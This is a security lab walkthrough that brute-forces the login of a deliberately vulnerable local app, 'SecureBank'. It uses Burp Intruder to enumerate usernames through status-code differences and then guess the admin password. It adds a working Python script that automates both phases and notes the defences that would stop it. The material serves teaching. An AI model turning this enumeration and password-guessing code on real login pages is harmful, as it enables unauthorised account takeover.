Brute Force Attack on Login Page
Procedure
Prerequisites: Python 3, Burp Suite Community Edition, a web browser.
Step 1: Start the Target Web Application
Clone the repository and start the Flask application. The deliberately vulnerable web application (SecureBank) listens on http://127.0.0.1:5000. Open the home page in a browser to verify it is up before proxying anything through Burp.
Step 2: Configure Burp Suite Proxy
Open Burp Suite and ensure the proxy listener is running on 127.0.0.1:8080. Open the Burp Suite built-in browser (or configure your browser to use Burp as a proxy). Navigate to the login page at http://127.0.0.1:5000/login.
Step 3: Capture a Login Request
Turn on Intercept in Burp Suite's Proxy tab. Enter any dummy credentials (e.g., test / test) in the login form and click Submit. Burp Suite captures the POST request to /login whose body is username=test&password=test; this request is the template for both attacks that follow.
Step 4: Send Request to Intruder
Right-click the captured POST request in Burp Suite and select Send to Intruder. Navigate to the Intruder tab.
Step 5: Configure Payload Position
In the Positions tab, click Clear § to remove all auto-marked positions. Highlight the value of the username parameter (e.g., test) and click Add §. The request body should read: username=§test§&password=test. Set attack type to Sniper, which substitutes each payload into the single marked position one request at a time while the password stays fixed at test.
Step 6: Load Username Wordlist
Go to the Payloads tab. Set payload type to Simple list. Click Load and select the username.txt wordlist file containing common usernames.
Step 7: Run the Attack and Analyze
Click Start Attack. Observe the results: most usernames return HTTP 404 (no such user), while the valid admin username returns HTTP 220 (wrong password). Sort by the Status column to spot the outlier. This is a username enumeration flaw: because the application answers "unknown user" and "wrong password" differently, one request per candidate is enough to learn which accounts exist. (220 is not a standard HTTP status code; it is simply what this vulnerable application returns, which makes the difference even easier to see. Even with standard codes, a difference in response length, body text or timing would serve the same purpose.)
Step 8: Reconfigure Payload Position
Go back to the Positions tab. Click Clear §. Replace the username value with the discovered account name (admin). Highlight the password value and click Add §. The request body should read: username=admin&password=§test§. Keep the attack type as Sniper.
Step 9: Load Password Wordlist
Go to the Payloads tab. Clear the previous payload list. Click Load and select the passwd.txt wordlist file containing common passwords.
Step 10: Run the Attack and Find the Password
Click Start Attack. Most passwords return HTTP 220 (wrong password); the correct admin password returns HTTP 210 (successful login). Sort by Status to identify the correct password. (Like 220, 210 is not a standard HTTP status code; it is what this application returns on success.) Note that the attack runs through the entire wordlist without being slowed down or locked out: a login form that rate-limited attempts, locked the account after a few failures, or returned the same response for unknown users and wrong passwords would make this procedure far slower or stop it outright.
Step 11: Login as Admin
Navigate to the login page and enter the discovered admin credentials. A successful login redirects you to the Admin Dashboard, confirming that the brute force attack recovered a working password.
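The same two-phase attack (Steps 5 to 10) can be scripted instead of driven through Intruder. The script below is an added example and is not part of the lab material or the SecureBank repository. It assumes the target behaves exactly as the procedure describes: POST http://127.0.0.1:5000/login with username=...&password=..., answering 404 for an unknown user, 220 for a wrong password and 210 for a successful login. The wordlist names username.txt and passwd.txt are the ones used in the lab; the mock probe, the account admin / password123 and the short demo wordlists are constructed here purely so the script can be exercised offline. It also generalises the "sort by Status" trick: rather than hard-coding 404, the enumeration phase treats the most common status as the baseline and reports every username that answered differently.

```python
#!/usr/bin/env python3
"""Two-phase login brute force: enumerate usernames, then guess the password.

Added example, not part of the lab material. It assumes the target behaves as
the procedure describes: POST /login with username=...&password=..., answering
404 for an unknown user, 220 for a wrong password and 210 for a successful login.
"""
from __future__ import annotations

import sys
import urllib.error
import urllib.parse
import urllib.request
from collections import Counter
from typing import Callable, Iterable, Optional

LOGIN_URL = "http://127.0.0.1:5000/login"  # from the lab
STATUS_NO_SUCH_USER = 404                  # status codes as reported in the lab
STATUS_BAD_PASSWORD = 220
STATUS_LOGIN_OK = 210

# A probe submits one (username, password) pair and returns the HTTP status code.
Probe = Callable[[str, str], int]


def http_probe(url: str = LOGIN_URL, timeout: float = 5.0) -> Probe:
    """Probe that POSTs the login form to the live target (replaces the Intruder request)."""
    def probe(username: str, password: str) -> int:
        body = urllib.parse.urlencode({"username": username, "password": password}).encode()
        req = urllib.request.Request(url, data=body, method="POST",
                                     headers={"Content-Type": "application/x-www-form-urlencoded"})
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                return resp.status          # 2xx codes such as 220/210 come back here
        except urllib.error.HTTPError as err:
            return err.code                 # 4xx such as 404 raise, but the code is the oracle we want
    return probe


def make_mock_probe(accounts: dict[str, str]) -> Probe:
    """Constructed stand-in for SecureBank so the script can be run offline (not the real app)."""
    def probe(username: str, password: str) -> int:
        if username not in accounts:
            return STATUS_NO_SUCH_USER
        return STATUS_LOGIN_OK if accounts[username] == password else STATUS_BAD_PASSWORD
    return probe


def enumerate_usernames(probe: Probe, candidates: Iterable[str], dummy_password: str = "test") -> list[str]:
    """Steps 5-7: valid usernames are the ones whose response status is the outlier.

    The most common status across the wordlist is taken as "no such user" and every
    candidate that answered differently is returned. This is the Intruder sort-by-status
    trick, generalised so it does not depend on the exact code the application uses.
    """
    statuses = {user: probe(user, dummy_password) for user in candidates}
    if not statuses:
        return []
    baseline, _ = Counter(statuses.values()).most_common(1)[0]
    return [user for user, status in statuses.items() if status != baseline]


def guess_password(probe: Probe, username: str, candidates: Iterable[str]) -> Optional[str]:
    """Steps 8-10: stop at the first password that produces the success status."""
    for password in candidates:
        if probe(username, password) == STATUS_LOGIN_OK:
            return password
    return None


def brute_force(probe: Probe, usernames: Iterable[str], passwords: Iterable[str]) -> dict[str, Optional[str]]:
    """Run both phases; a value of None means the user exists but no listed password matched."""
    passwords = list(passwords)             # reused once per discovered user
    return {user: guess_password(probe, user, passwords) for user in enumerate_usernames(probe, usernames)}


def load_wordlist(path: str) -> list[str]:
    with open(path, encoding="utf-8", errors="ignore") as fh:
        return [line.strip() for line in fh if line.strip()]


def main() -> None:
    if "--demo" in sys.argv:
        # Offline run against the constructed mock; account and wordlists are made up for the demo.
        probe = make_mock_probe({"admin": "password123"})
        usernames, passwords = ["root", "test", "admin", "guest"], ["123456", "password123"]
    else:
        probe = http_probe()
        usernames, passwords = load_wordlist("username.txt"), load_wordlist("passwd.txt")
    print(brute_force(probe, usernames, passwords))


if __name__ == "__main__":
    main()
```

Run it with --demo to see both phases against the mock, or without arguments (with username.txt and passwd.txt in the working directory and SecureBank running) to reproduce Steps 5 to 10 against the live target. The outlier heuristic in enumerate_usernames relies on the wordlist being mostly invalid names, which is the normal case for a common-usernames list; with only one or two candidates there is no meaningful baseline, so fall back to comparing against STATUS_NO_SUCH_USER directly in that situation. Requests go straight to the target rather than through Burp; point LOGIN_URL at a proxy-aware transport if you want to watch the traffic in the Proxy history.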